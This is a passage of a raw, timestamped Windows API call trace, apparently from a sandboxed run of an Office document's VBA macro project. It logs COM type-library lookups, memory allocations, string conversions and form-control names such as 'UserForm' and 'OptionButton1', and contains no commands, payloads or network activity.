(This=0x7fefe015380, cb=0x60) returned 0x77760d0 [0032.650] strcpy_s (in: _Dst=0xb5c6440, _DstSize=0xa, _Src="Challenge" | out: _Dst="Challenge") returned 0x0 [0032.650] strcpy_s (in: _Dst=0x78018d0, _DstSize=0x7, _Src="sender" | out: _Dst="sender") returned 0x0 [0032.650] IMalloc:Free (This=0x7fefe015380, pv=0x7846110) [0032.650] IMalloc:Alloc (This=0x7fefe015380, cb=0x50) returned 0xb5a60f0 [0032.650] strcpy_s (in: _Dst=0xb5c6458, _DstSize=0xf, _Src="PropellersHead" | out: _Dst="PropellersHead") returned 0x0 [0032.651] IMalloc:Free (This=0x7fefe015380, pv=0x7846110) [0032.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x783802c, cbMultiByte=10, lpWideCharStr=0x9cf050e, cchWideChar=22 | out: lpWideCharStr="AnimExpl 5") returned 10 [0032.651] IMalloc:Alloc (This=0x7fefe015380, cb=0xc0) returned 0x765d130 [0032.651] IMalloc:GetSize (This=0x7fefe015380, pv=0x765d130) returned 0xc0 [0032.651] IMalloc:Free (This=0x7fefe015380, pv=0x7846110) [0032.651] IMalloc:Alloc (This=0x7fefe015380, cb=0x318) returned 0xb5315e0 [0032.652] IMalloc:Free (This=0x7fefe015380, pv=0xb5a6030) [0032.652] IUnknown:AddRef (This=0xb4db990) returned 0x5 [0032.652] IUnknown:AddRef (This=0xb4db990) returned 0x5 [0032.652] IMalloc:Alloc (This=0x7fefe015380, cb=0x12) returned 0xb494cf0 [0032.652] IMalloc:Free (This=0x7fefe015380, pv=0xb494cf0) [0032.652] IMalloc:Alloc (This=0x7fefe015380, cb=0x11) returned 0xb494cf0 [0032.652] IMalloc:Free (This=0x7fefe015380, pv=0xb494cf0) [0032.653] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x9d00000 [0032.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb47639c, cbMultiByte=14, lpWideCharStr=0x9d001ec, cchWideChar=30 | out: lpWideCharStr="Content status") returned 14 [0032.654] IUnknown:AddRef (This=0xb4db9e8) returned 0x4 [0032.654] IMalloc:Alloc (This=0x7fefe015380, cb=0x38) returned 0x75df8b0 [0032.655] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0032.655] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BuiltInDocumentProperties") returned 0x10bb5f [0032.655] strcpy_s (in: _Dst=0x2e4960, _DstSize=0x1a, _Src="BuiltInDocumentProperties" | out: _Dst="BuiltInDocumentProperties") returned 0x0 [0032.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4960, cbMultiByte=26, lpWideCharStr=0x2e47b0, cchWideChar=26 | out: lpWideCharStr="BuiltInDocumentProperties") returned 26 [0032.655] IUnknown:AddRef (This=0x782a220) returned 0x8 [0032.655] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="BuiltInDocumentProperties", lHashVal=0x10bb5f, pfName=0x2e4880, pBstrLibName=0x2e47b0 | out: pfName=0x2e4880*=0, pBstrLibName=0x2e47b0) returned 0x0 [0032.655] IUnknown:Release (This=0x782a220) returned 0x7 [0032.655] IUnknown:AddRef (This=0x731da90) returned 0x14 [0032.655] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="BuiltInDocumentProperties", lHashVal=0x10bb5f, pfName=0x2e4880, pBstrLibName=0x2e47b0 | out: pfName=0x2e4880*=1, pBstrLibName=0x2e47b0) returned 0x0 [0032.655] IUnknown:Release (This=0x731da90) returned 0x13 [0032.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BuiltInDocumentProperties", cchWideChar=-1, lpMultiByteStr=0x2e4960, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BuiltInDocumentProperties", lpUsedDefaultChar=0x0) returned 26 [0032.655] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BuiltInDocumentProperties") returned 0x10bb5f [0032.655] IUnknown:AddRef (This=0x778f570) returned 0x3 [0032.655] IUnknown:Release (This=0x778f570) returned 0x2 [0032.655] IUnknown:QueryInterface (in: This=0x778f570, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4ab0 | out: ppvObject=0x2e4ab0*=0x0) returned 0x80004002 [0032.655] IUnknown:QueryInterface (in: This=0x778f570, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4a80 | out: ppvObject=0x2e4a80*=0x0) returned 0x80004002 [0032.655] IUnknown:QueryInterface (in: This=0x778f570, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4a70 | out: ppvObject=0x2e4a70*=0x0) returned 0x80004002 [0032.655] IUnknown:QueryInterface (in: This=0x778f570, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4a78 | out: ppvObject=0x2e4a78*=0x0) returned 0x80004002 [0032.655] ITypeInfo:RemoteGetTypeAttr (in: This=0x778f570, ppTypeAttr=0x2e4aa8, pDummy=0x10 | out: ppTypeAttr=0x2e4aa8, pDummy=0x10) returned 0x0 [0032.655] ITypeInfo:LocalReleaseTypeAttr (This=0x778f570) returned 0x0 [0032.655] IUnknown:AddRef (This=0x778f570) returned 0x5 [0032.655] ITypeInfo:RemoteGetTypeAttr (in: This=0x778f570, ppTypeAttr=0x2e4e18, pDummy=0x0 | out: ppTypeAttr=0x2e4e18, pDummy=0x0) returned 0x0 [0032.655] ITypeInfo:LocalReleaseTypeAttr (This=0x778f570) returned 0x0 [0032.655] IUnknown:Release (This=0x778f570) returned 0x4 [0032.656] IMalloc:Free (This=0x7fefe015380, pv=0x7846110) [0032.656] ITypeInfo:RemoteGetTypeAttr (in: This=0x778f570, ppTypeAttr=0x2e43b0, pDummy=0x0 | out: ppTypeAttr=0x2e43b0, pDummy=0x0) returned 0x0 [0032.656] ITypeInfo:LocalReleaseTypeAttr (This=0x778f570) returned 0x0 [0032.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a516c6, cbMultiByte=7, lpWideCharStr=0x2e4980, cchWideChar=6 | out: lpWideCharStr="Value") returned 0 [0032.656] wcscpy_s (in: _Destination=0xb5c7440, _SizeInWords=0x6, _Source="Value" | out: _Destination="Value") returned 0x0 [0032.656] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0032.656] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tt") returned 0x105f4d [0032.656] strcpy_s (in: _Dst=0x2e4ac0, _DstSize=0x3, _Src="tt" | out: _Dst="tt") returned 0x0 [0032.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4ac0, cbMultiByte=3, lpWideCharStr=0x2e4910, cchWideChar=3 | out: lpWideCharStr="tt") returned 3 [0032.656] IUnknown:AddRef (This=0x782a220) returned 0x8 [0032.656] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="tt", lHashVal=0x105f4d, pfName=0x2e49e0, pBstrLibName=0x2e4910 | out: pfName=0x2e49e0*=0, pBstrLibName=0x2e4910) returned 0x0 [0032.656] IUnknown:Release (This=0x782a220) returned 0x7 [0032.656] IUnknown:AddRef (This=0x731da90) returned 0x16 [0032.656] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="tt", lHashVal=0x105f4d, pfName=0x2e49e0, pBstrLibName=0x2e4910 | out: pfName=0x2e49e0*=0, pBstrLibName=0x2e4910) returned 0x0 [0032.656] IUnknown:Release (This=0x731da90) returned 0x15 [0032.656] IUnknown:AddRef (This=0x731cc80) returned 0x12 [0032.656] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="tt", lHashVal=0x105f4d, pfName=0x2e49e0, pBstrLibName=0x2e4910 | out: pfName=0x2e49e0*=0, pBstrLibName=0x2e4910) returned 0x0 [0032.656] IUnknown:Release (This=0x731cc80) returned 0x11 [0032.656] IUnknown:AddRef (This=0x7829f50) returned 0x7 [0032.656] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="tt", lHashVal=0x105f4d, pfName=0x2e49e0, pBstrLibName=0x2e4910 | out: pfName=0x2e49e0*=0, pBstrLibName=0x2e4910) returned 0x0 [0032.656] IUnknown:Release (This=0x7829f50) returned 0x6 [0032.656] IMalloc:Alloc (This=0x7fefe015380, cb=0xa) returned 0xb494b90 [0032.656] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_tt") returned 0x10f3f5 [0032.656] strcpy_s (in: _Dst=0x2e4c70, _DstSize=0xa, _Src="_B_var_tt" | out: _Dst="_B_var_tt") returned 0x0 [0032.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4c70, cbMultiByte=10, lpWideCharStr=0x2e4ac0, cchWideChar=10 | out: lpWideCharStr="_B_var_tt") returned 10 [0032.656] IUnknown:AddRef (This=0x782a220) returned 0x8 [0032.656] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_tt", lHashVal=0x10f3f5, pfName=0x2e4b90, pBstrLibName=0x2e4ac0 | out: pfName=0x2e4b90*=0, pBstrLibName=0x2e4ac0) returned 0x0 [0032.657] IUnknown:Release (This=0x782a220) returned 0x7 [0032.657] IUnknown:AddRef (This=0x731da90) returned 0x16 [0032.657] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_tt", lHashVal=0x10f3f5, pfName=0x2e4b90, pBstrLibName=0x2e4ac0 | out: pfName=0x2e4b90*=0, pBstrLibName=0x2e4ac0) returned 0x0 [0032.657] IUnknown:Release (This=0x731da90) returned 0x15 [0032.657] IUnknown:AddRef (This=0x731cc80) returned 0x12 [0032.657] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_tt", lHashVal=0x10f3f5, pfName=0x2e4b90, pBstrLibName=0x2e4ac0 | out: pfName=0x2e4b90*=0, pBstrLibName=0x2e4ac0) returned 0x0 [0032.657] IUnknown:Release (This=0x731cc80) returned 0x11 [0032.657] IUnknown:AddRef (This=0x7829f50) returned 0x7 [0032.657] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_tt", lHashVal=0x10f3f5, pfName=0x2e4b90, pBstrLibName=0x2e4ac0 | out: pfName=0x2e4b90*=0, pBstrLibName=0x2e4ac0) returned 0x0 [0032.657] IUnknown:Release (This=0x7829f50) returned 0x6 [0032.657] IUnknown:AddRef (This=0x782b300) returned 0x7 [0032.657] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_tt", lHashVal=0x10f3f5, pfName=0x2e4b90, pBstrLibName=0x2e4ac0 | out: pfName=0x2e4b90*=0, pBstrLibName=0x2e4ac0) returned 0x0 [0032.657] IUnknown:Release (This=0x782b300) returned 0x6 [0032.657] IUnknown:AddRef (This=0x782a220) returned 0x8 [0032.657] IUnknown:Release (This=0x782a220) returned 0x7 [0032.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb4763c8, cbMultiByte=5, lpWideCharStr=0x9d00eee, cchWideChar=12 | out: lpWideCharStr="FURRY") returned 5 [0032.657] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0032.657] ITypeInfo:GetRefTypeInfo (in: This=0x784ce98, hreftype=0x480, ppTInfo=0x2e4858 | out: ppTInfo=0x2e4858*=0x784cef0) returned 0x0 [0032.657] IUnknown:QueryInterface (in: This=0x784cef0, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4a28 | out: ppvObject=0x2e4a28*=0x0) returned 0x80004002 [0032.657] ITypeInfo:RemoteGetTypeAttr (in: This=0x784cef0, ppTypeAttr=0x2e48a8, pDummy=0x10 | out: ppTypeAttr=0x2e48a8, pDummy=0x10) returned 0x0 [0032.657] ITypeInfo:LocalReleaseTypeAttr (This=0x784cef0) returned 0x0 [0032.657] IUnknown:QueryInterface (in: This=0x784cef0, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e45b0 | out: ppvObject=0x2e45b0*=0x0) returned 0x80004002 [0032.657] IUnknown:QueryInterface (in: This=0x784cef0, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e45a0 | out: ppvObject=0x2e45a0*=0x0) returned 0x80004002 [0032.657] IUnknown:QueryInterface (in: This=0x784cef0, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e45a8 | out: ppvObject=0x2e45a8*=0x0) returned 0x80004002 [0032.657] ITypeInfo:RemoteGetTypeAttr (in: This=0x784cef0, ppTypeAttr=0x2e45d8, pDummy=0x10 | out: ppTypeAttr=0x2e45d8, pDummy=0x10) returned 0x0 [0032.657] ITypeInfo:LocalReleaseTypeAttr (This=0x784cef0) returned 0x0 [0032.657] IUnknown:AddRef (This=0x784cef0) returned 0x2 [0032.657] IUnknown:QueryInterface (in: This=0x784cef0, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4750 | out: ppvObject=0x2e4750*=0x0) returned 0x80004002 [0032.657] IUnknown:QueryInterface (in: This=0x784cef0, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4748 | out: ppvObject=0x2e4748*=0x0) returned 0x80004002 [0032.657] IUnknown:Release (This=0x784cef0) returned 0x1 [0032.658] IUnknown:QueryInterface (in: This=0x784ce98, riid=0x7fee3a76b50*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2e48c0 | out: ppvObject=0x2e48c0*=0x784ce98) returned 0x0 [0032.658] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x784ce98, memid=1610612790, invkind=1, pFuncIndex=0x2e48b8 | out: pFuncIndex=0x2e48b8*=0x36) returned 0x0 [0032.658] ITypeInfo2:GetParamCustData (in: This=0x784ce98, indexFunc=0x36, indexParam=0x2, GUID=0x7fee3a84fb8*(Data1=0x270d72b0, Data2=0xffb8, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xbd, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x26, [7]=0xee)), pVarVal=0x2e48c8 | out: pVarVal=0x2e48c8*(varType=0x0, wReserved1=0xb54, wReserved2=0x0, wReserved3=0x0, varVal1=0xb522f60, varVal2=0x2e55d8)) returned 0x0 [0032.658] IUnknown:Release (This=0x784ce98) returned 0x1 [0032.658] IUnknown:QueryInterface (in: This=0x784ce98, riid=0x7fee3a76b50*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2e48c0 | out: ppvObject=0x2e48c0*=0x784ce98) returned 0x0 [0032.658] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x784ce98, memid=1610612790, invkind=1, pFuncIndex=0x2e48b8 | out: pFuncIndex=0x2e48b8*=0x36) returned 0x0 [0032.658] ITypeInfo2:GetParamCustData (in: This=0x784ce98, indexFunc=0x36, indexParam=0x3, GUID=0x7fee3a84fb8*(Data1=0x270d72b0, Data2=0xffb8, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xbd, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x26, [7]=0xee)), pVarVal=0x2e48c8 | out: pVarVal=0x2e48c8*(varType=0x3, wReserved1=0xb54, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x2e55d8)) returned 0x0 [0032.662] IUnknown:Release (This=0x784ce98) returned 0x1 [0032.670] IUnknown:AddRef (This=0x784cef0) returned 0x2 [0032.670] IUnknown:QueryInterface (in: This=0x784ce98, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4bd0 | out: ppvObject=0x2e4bd0*=0x0) returned 0x80004002 [0032.670] IUnknown:QueryInterface (in: This=0x784ce98, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4ba0 | out: ppvObject=0x2e4ba0*=0x0) returned 0x80004002 [0032.670] IUnknown:QueryInterface (in: This=0x784ce98, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4b90 | out: ppvObject=0x2e4b90*=0x0) returned 0x80004002 [0032.670] IUnknown:QueryInterface (in: This=0x784ce98, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4b98 | out: ppvObject=0x2e4b98*=0x0) returned 0x80004002 [0032.670] ITypeInfo:RemoteGetTypeAttr (in: This=0x784ce98, ppTypeAttr=0x2e4bc8, pDummy=0x10 | out: ppTypeAttr=0x2e4bc8, pDummy=0x10) returned 0x0 [0032.670] ITypeInfo:LocalReleaseTypeAttr (This=0x784ce98) returned 0x0 [0032.670] IUnknown:AddRef (This=0x784ce98) returned 0x3 [0032.671] strcpy_s (in: _Dst=0xb5c7470, _DstSize=0x9, _Src="VBE7.DLL" | out: _Dst="VBE7.DLL") returned 0x0 [0032.671] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0xb5c74d0 [0032.671] IMalloc:Free (This=0x7fefe015380, pv=0x7846110) [0032.672] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0032.672] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0032.673] IUnknown:AddRef (This=0xb4db9e8) returned 0x5 [0032.673] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0032.673] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0032.674] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0032.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb4763fc, cbMultiByte=0, lpWideCharStr=0x9d0270e, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0032.674] IMalloc:Free (This=0x7fefe015380, pv=0x7846110) [0032.674] ITypeInfo:RemoteGetTypeAttr (in: This=0x778f570, ppTypeAttr=0x2e4640, pDummy=0x0 | out: ppTypeAttr=0x2e4640, pDummy=0x0) returned 0x0 [0032.674] ITypeInfo:LocalReleaseTypeAttr (This=0x778f570) returned 0x0 [0032.674] IMalloc:Free (This=0x7fefe015380, pv=0xb5a61b0) [0032.675] SetErrorMode (uMode=0x8001) returned 0x8005 [0032.675] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0032.676] SetErrorMode (uMode=0x8005) returned 0x8005 [0032.676] GetProcAddress (hModule=0x7fee36e0000, lpProcName=0x2c7) returned 0x7fee3a59eb0 [0032.832] GetUserDefaultLCID () returned 0x409 [0032.860] SafeArrayCopy (in: psa=0x75e1e40, ppsaOut=0x78015f8 | out: ppsaOut=0x78015f8) returned 0x0 [0032.860] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x9e40000 [0032.864] SysStringByteLen (bstr="") returned 0x0 [0032.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x2e4730, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x90H.", lpUsedDefaultChar=0x0) returned 0 [0032.864] IUnknown:QueryInterface (in: This=0x784cf48, riid=0x7fee3a76b50*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2e4760 | out: ppvObject=0x2e4760*=0x784cf48) returned 0x0 [0032.864] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x784cf48, memid=1610612738, invkind=1, pFuncIndex=0x2e4758 | out: pFuncIndex=0x2e4758*=0x2) returned 0x0 [0032.864] ITypeInfo2:GetParamCustData (in: This=0x784cf48, indexFunc=0x2, indexParam=0x1, GUID=0x7fee3a84fb8*(Data1=0x270d72b0, Data2=0xffb8, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xbd, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x26, [7]=0xee)), pVarVal=0x2e4768 | out: pVarVal=0x2e4768*(varType=0x0, wReserved1=0xb54, wReserved2=0x0, wReserved3=0x0, varVal1=0xb529780, varVal2=0x2e5478)) returned 0x0 [0032.864] IUnknown:Release (This=0x784cf48) returned 0x1 [0032.865] IUnknown:QueryInterface (in: This=0x784cf48, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4a70 | out: ppvObject=0x2e4a70*=0x0) returned 0x80004002 [0032.865] IUnknown:QueryInterface (in: This=0x784cf48, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4a40 | out: ppvObject=0x2e4a40*=0x0) returned 0x80004002 [0032.865] IUnknown:QueryInterface (in: This=0x784cf48, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4a30 | out: ppvObject=0x2e4a30*=0x0) returned 0x80004002 [0032.865] IUnknown:QueryInterface (in: This=0x784cf48, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4a38 | out: ppvObject=0x2e4a38*=0x0) returned 0x80004002 [0032.865] ITypeInfo:RemoteGetTypeAttr (in: This=0x784cf48, ppTypeAttr=0x2e4a68, pDummy=0x10 | out: ppTypeAttr=0x2e4a68, pDummy=0x10) returned 0x0 [0032.865] ITypeInfo:LocalReleaseTypeAttr (This=0x784cf48) returned 0x0 [0032.865] IUnknown:AddRef (This=0x784cf48) returned 0x3 [0032.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb54b67c, cbMultiByte=0, lpWideCharStr=0x9e4035c, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0032.867] IMalloc:Free (This=0x7fefe015380, pv=0x7846630) [0032.867] IUnknown:AddRef (This=0xb5a5078) returned 0x4 [0032.867] IUnknown:AddRef (This=0xb5a51f8) returned 0x2 [0032.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="UserForm", cchWideChar=9, lpMultiByteStr=0x2e43e0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UserForm", lpUsedDefaultChar=0x0) returned 9 [0032.867] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm") returned 0x10044e [0032.877] ITypeInfo:RemoteGetDocumentation (in: This=0xb5a5078, memid=2001, refPtrFlags=0x2e44e8, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x2e44f0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x2e44f0*="") returned 0x0 [0032.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OptionButton1", cchWideChar=14, lpMultiByteStr=0x2e43a0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OptionButton1", lpUsedDefaultChar=0x0) returned 14 [0032.877] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OptionButton1") returned 0x10406b [0032.877] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0x5000025, ppTInfo=0x2e44c0 | out: ppTInfo=0x2e44c0*=0xb5b1d88) returned 0x0 [0032.878] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b1d88, ppTypeAttr=0x2e4420, pDummy=0x51e | out: ppTypeAttr=0x2e4420, pDummy=0x51e) returned 0x0 [0032.878] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b1d88) returned 0x0 [0032.878] ITypeInfo:GetImplTypeFlags (in: This=0xb5b1d88, index=0x0, pImplTypeFlags=0x2e4408 | out: pImplTypeFlags=0x2e4408*=1) returned 0x0 [0032.878] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b1d88, index=0x0, pRefType=0x2e4410 | out: pRefType=0x2e4410*=0x2400) returned 0x0 [0032.878] ITypeInfo:GetRefTypeInfo (in: This=0xb5b1d88, hreftype=0x2400, ppTInfo=0x2e4418 | out: ppTInfo=0x2e4418*=0xb5b1de0) returned 0x0 [0032.878] IUnknown:Release (This=0xb5b1de0) returned 0x0 [0032.878] ITypeInfo:GetImplTypeFlags (in: This=0xb5b1d88, index=0x1, pImplTypeFlags=0x2e4408 | out: pImplTypeFlags=0x2e4408*=3) returned 0x0 [0032.878] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b1d88, index=0x1, pRefType=0x2e4410 | out: pRefType=0x2e4410*=0x2d80) returned 0x0 [0032.878] ITypeInfo:GetRefTypeInfo (in: This=0xb5b1d88, hreftype=0x2d80, ppTInfo=0x2e4418 | out: ppTInfo=0x2e4418*=0xb5b1ff0) returned 0x0 [0032.879] ITypeInfo:RemoteGetDocumentation (in: This=0xb5a5078, memid=2002, refPtrFlags=0x2e44e8, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0032.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ToggleButton2", cchWideChar=14, lpMultiByteStr=0x2e43a0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ToggleButton2", lpUsedDefaultChar=0x0) returned 14 [0032.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ToggleButton2") returned 0x10bc48 [0032.879] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0x5000031, ppTInfo=0x2e44c0 | out: ppTInfo=0x2e44c0*=0xb5b2048) returned 0x0 [0032.879] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b2048, ppTypeAttr=0x2e4420, pDummy=0x3ba | out: ppTypeAttr=0x2e4420, pDummy=0x3ba) returned 0x0 [0032.879] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b2048) returned 0x0 [0032.879] ITypeInfo:GetImplTypeFlags (in: This=0xb5b2048, index=0x0, pImplTypeFlags=0x2e4408 | out: pImplTypeFlags=0x2e4408*=1) returned 0x0 [0032.879] 